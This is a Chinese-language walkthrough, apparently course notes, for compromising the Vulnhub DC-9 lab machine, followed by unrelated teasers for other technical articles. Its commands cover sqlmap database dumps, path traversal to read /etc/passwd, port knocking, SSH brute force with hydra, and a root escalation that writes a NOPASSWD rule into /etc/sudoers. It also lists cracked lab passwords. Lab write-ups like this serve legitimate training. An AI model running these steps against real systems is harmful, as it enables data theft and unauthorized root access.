渗透Vulnhub-DC-9靶机

本篇文章旨在为网络安全渗透测试行业靶机教学。通过阅读本文,读者将能够对渗透Vulnhub系列DC-6靶机有定的了解

一、信息收集阶段

DC-9靶场信息:

DC-9靶场介绍:
https://www.vulnhub.com/entry/dc-9,412/
DC-9靶场下载:
https://download.vulnhub.com/dc/DC-9.zip


因为靶机为本地部署虚拟机网段,查看dhcp地址池设置。得到信息IP为:192.168.60.0/24

1、扫描网段,发现主机

nmap -sP 192.168.60.0/24

2、扫描主机详细信息

nmap -sT -sV -sC  192.168.60.169
# -sT 会尝试与目标主机的每个端口建立完整的 TCP 连接
# -sV 尝试确定每个打开端口上运行的服务的版本
# -sC 使用默认的脚本扫描(Script Scanning)可以帮助发现更多的信息,如漏洞、配置错误等

二、攻击面寻找及攻击阶段

1、Wappalyzer插件

2、网站信息

3、burp suite 模糊测试sql注入

4、sqlmap sql注入测试

(1)复制burp suite抓取的请求包到post.txt文件

(2)sqlmap测试post文件内的请求数据包
sqlmap -r post.txt

(3)sqlmap获取数据库库名
sqlmap -r post.txt --dbs 

(4)sqlmap获取users数据库的表的名
sqlmap -r post.txt -D users --tables

(5)sqlmap获取获取users数据库,UserDetails表的字段名
sqlmap -r post.txt -D users -T UserDetails --columns

(6)sqlmap获取获取users数据库,UserDetails表,username跟password字段内容
sqlmap -r post.txt -D users -T UserDetails -C username --dump
sqlmap -r post.txt -D users -T UserDetails -C password --dump

(7)sqlmap获取Staff库的表名
sqlmap -r post.txt -D Staff --tables

(8)sqlmap获取Staff库,Users表里面的字段名
sqlmap -r post.txt -D Staff -T Users --columns

(9)sqlmap获取Staff库,Users表里面的username跟password字段的信息
sqlmap -r post.txt -D Staff -T Users -C Username --dump
sqlmap -r post.txt -D Staff -T Users -C Password --dump

在这里插入图片描述

(10)MD5解密

5、sqlmap获取的admin账号登录平台

6、查看文件包含漏洞

192.168.60.169/welcome.php?file=../../../../etc/passwd

7、敲击端口打开隐藏ssh端口

http://192.168.60.169/manage.php?file=../../../../etc/knockd.conf


在信息收集阶段我们知道ssh端口应该是被隐藏了,我们利用文件包含漏洞查看到需要打开的三个端口。使用knock去敲击

#kali安装knockd
#sudo apt-get install knockd knock 192.168.60.169 7469 8475 9842 #敲击目标主机

8、hydra爆破ssh

#九头蛇
hydra -L 1.txt -P 2.txt  ssh://192.168.60.169 #nmap
nmap -p 22 --script=ssh-brute --script-args userdb=1.txt,passdb=2.txt 192.168.60.169

9、登录janitor用户信息收集

#[22][ssh] host: 192.168.60.169   login: chandlerb   password: UrAG0D!
#[22][ssh] host: 192.168.60.169   login: joeyt   password: Passw0rd
#[22][ssh] host: 192.168.60.169   login: janitor   password: Ilovepeepeessh janitor@192.168.60.169

ls -al  #查看全部文件
cd .secrets-for-putin
cat cat passwords-found-on-post-it-notes.txt 

10、hydra重新爆破ssh

获得新的的账号密码:fredf 密码:B4-Tru3-001

11、查看sudo -l

三、提权阶段

1、前面已经通过knock敲击端口

knock 192.168.111.137 7469 8475 9842

2、查看test源码

根据sudo -l已知文件目录(root) NOPASSWD: /opt/devstuff/dist/test/test

cd /opt/devstuff/
ls

3、自定义 sudo 规则作为提权

echo "fredf ALL=(root) NOPASSWD:ALL" > /tmp/abc.txt    #fredf 用户可以在任何主机以root身份运行任何命令

4、写入 /etc/sudoers文件

sudo /opt/devstuff/dist/test/test /tmp/abc.txt /etc/sudoers

5、提权成功

sudo su root





声明! 学习内容来自B站up主 泷羽sec的OSCP考证培训课程有兴趣的师傅可以关注一下,如涉及侵权马上删除文章,笔记只是方便各位师傅的学习和探讨,文章所提到的网站以及内容,只做学习交流,其他均与本人以及泷羽sec团队无关,切勿触碰法律底线,否则后果自负!!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/495112.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

[WASAPI]从Qt MultipleMedia来看WASAPI

[WASAPI] 从Qt MultipleMedia 来看WASAPI 最近在学习有关Windows上的音频驱动相关的知识,在正式开始说WASAPI之前,我想先说一说Qt的Multiple Media,为什么呢?因为Qt的MultipleMedia实际上是WASAPI的一层封装,它在是线…

Linux下编译安装Kokkos

本文记录在Linux下编译安装Kokkos的流程。 零、环境 操作系统Ubuntu 22.04.4 LTSVS Code1.92.1Git2.34.1GCC11.4.0CMake3.22.1oneAPI2024.2.1 一、安装依赖 二、编译安装 参考文献 Mills R T. PETSc/TAO Developments for Early Exascale Systems[J]. 2024.Josef R. A Stud…

HTMLCSS:惊!3D 折叠按钮

这段代码创建了一个具有 3D 效果和动画的按钮,按钮上有 SVG 图标和文本。按钮在鼠标悬停时会显示一个漂浮点动画,图标会消失并显示一个线条动画。这种效果适用于吸引用户注意并提供视觉反馈。按钮的折叠效果和背景渐变增加了页面的美观性。 演示效果 HT…

容器技术所涉及Linux内核关键技术

容器技术所涉及Linux内核关键技术 一、容器技术前世今生 1.1 1979年 — chroot 容器技术的概念可以追溯到1979年的UNIX chroot。它是一套“UNIX操作系统”系统,旨在将其root目录及其它子目录变更至文件系统内的新位置,且只接受特定进程的访问。这项功…

Git远程仓库的多人协作

目录 一.项目克隆 二.多人协作 1.创建林冲仓库 2.协作处理 3.处理冲突 三.分支推送协作 四.分支拉取协作 五.远程分支的删除 一.项目克隆 我们可以把远程项目克隆到本地形成一个本地的仓库 git clone https://github.com/txjava-teach/txjava-code.git //链接你自己的远…

Docker 部署 plumelog 最新版本 实现日志采集

1.配置plumelog.yml version: 3 services:plumelog:#此镜像是基于plumelog-3.5.3版本image: registry.cn-hangzhou.aliyuncs.com/k8s-xiyan/plumelog:3.5.3container_name: plumelogports:- "8891:8891"environment:plumelog.model: redisplumelog.queue.redis.redi…

Spring常见面试题总结

关于详细介绍,可以看我写的 ( Spring知识点) 这篇文章。 Spring 基础 什么是 Spring 框架? Spring 是一款开源的轻量级 Java 开发框架,旨在提高开发人员的开发效率以及系统的可维护性。 我们一般说 Spring 框架指的都是 Spring Framework&#xff0c…

Mac系统下 IDEA配置Maven本地仓库

1.为什么需要配置本地仓库? 在软件开发过程中,使用Maven工具进行依赖管理是常见的做法。Maven通过集中管理各种依赖库,能够帮助开发者在项目中轻松地引入所需的第三方库,并确保项目能够顺利构建和部署。然而,在使用Mav…

RGCL:A Review-aware Graph Contrastive Learning Framework for Recommendation

A Review-aware Graph Contrastive Learning Framework for Recommendation 解决的问题 基于评论的推荐可以自然地形成为具有来自相应用户项目评论的边特征的用户项目二分图。那么就可以利用评论感知图中独特的自监督信号来指导推荐的两个组件:用户-项目嵌入学习,用户-项目…

5、mysql的读写分离

主从复制 主从复制的含义 主从复制:在一个mysql的集群当中,至少3台,即主1台,从2台。 当有数据写入时,主负责写入本库,然后把数据同步到从服务器。 一定是在主服务器写入数据,从服务器的写入…

重生之我在异世界学编程之C语言:深入预处理篇(上)

大家好,这里是小编的博客频道 小编的博客:就爱学编程 很高兴在CSDN这个大家庭与大家相识,希望能在这里与大家共同进步,共同收获更好的自己!!! 本文目录 引言正文一、预处理的作用与流程&#xf…

信创源代码加密的答案:信创沙箱

在信息化与工业化融合创新(信创)的背景下,企业面临着前所未有的数据安全挑战。SDC沙盒技术以其独特的隔离和保护机制,为信创环境提供了强有力的支持。以下是SDC沙盒在信创支持方面的优势,这些优势体现了其在保护企业数…

计算机网络B重修班-期末复习

[TOC] (计算机网络B重修班-期末复习) 一、单选 (20题,1分/题,共20分) 二、判断 (10题,1分/题,共10分) 三、填空 (10题,1分/题,共10…

结合实例从HCI层分析经典蓝牙连接和配对过程

我们知道,经典蓝牙BREDR的link key协商是在LMP层做的,那么蓝牙Host在鉴权的过程中,会跟BT SOC有哪些交互: 首次配对 在HCI Inuqiry找到想要配对的设备后,Host会调用HCI Create Connection命令去连接对方设备&#xf…

StartAI图生图局部重绘,让画面细节焕发新生!!

在设计的世界里,每一个细节都承载着我们的创意与心血。然而,有时我们总会遇到一些不尽如人意的画面细节,它们如同瑕疵般破坏了整体的和谐与美感。今天,我要向大家推荐一款强大的工具——StartAI的局部重绘功能,它正是我…

VMware vCenter保姆级安装部署(VMware VCenter Nanny Level Installation and Deployment)

VMware vCenter保姆级安装部署教程 VMware vCenter‌是由VMware开发的一款虚拟化管理平台,主要用于管理和监控虚拟化环境中的虚拟机、主机和存储资源。它提供了一个集中控制的平台,简化了虚拟化基础设施的管理工作,提高了资源利用率和灵活性…

蓝牙协议——音量控制

手机设置绝对音量 使用Ellisys查看如下: 使用Wireshark查看如下: 音量的量程是128,0x44的十进制是68,53%或54%音量的计算如下: 68 / 128 53.125%耳机设置绝对音量

如何完全剔除对Eureka的依赖,报错Cannot execute request on any known server

【现象】 程序运行报错如下: com.netflix.discovery.shared.transport.TransportException报错Cannot execute request on any known server 【解决方案】 (1)在Maven工程中的pom去掉Eureka相关的引用(注释以下部分&#xff0…

从AI换脸到篡改图像,合合信息如何提升视觉内容安全?

本文目录 引言一、AI“真假之战”下的发展现状与考验挑战1.1 视觉内容安全现状与技术分类1.2视觉内容安全企业1.3视觉内容安全领域挑战 二、开山之石:引领视觉内容安全的创新之路2.1合合内容安全系统2.2发起编制相关技术规范2.3参与篡改检测挑战赛 三、视觉内容安全…

虚幻引擎结构之ULevel

在虚幻引擎中,场景的组织和管理是通过子关卡(Sublevel)来实现的。这种设计不仅提高了资源管理的灵活性,还优化了游戏性能,特别是在处理大型复杂场景时。 1. 场景划分模式 虚幻引擎采用基于子关卡的场景划分模式。每个…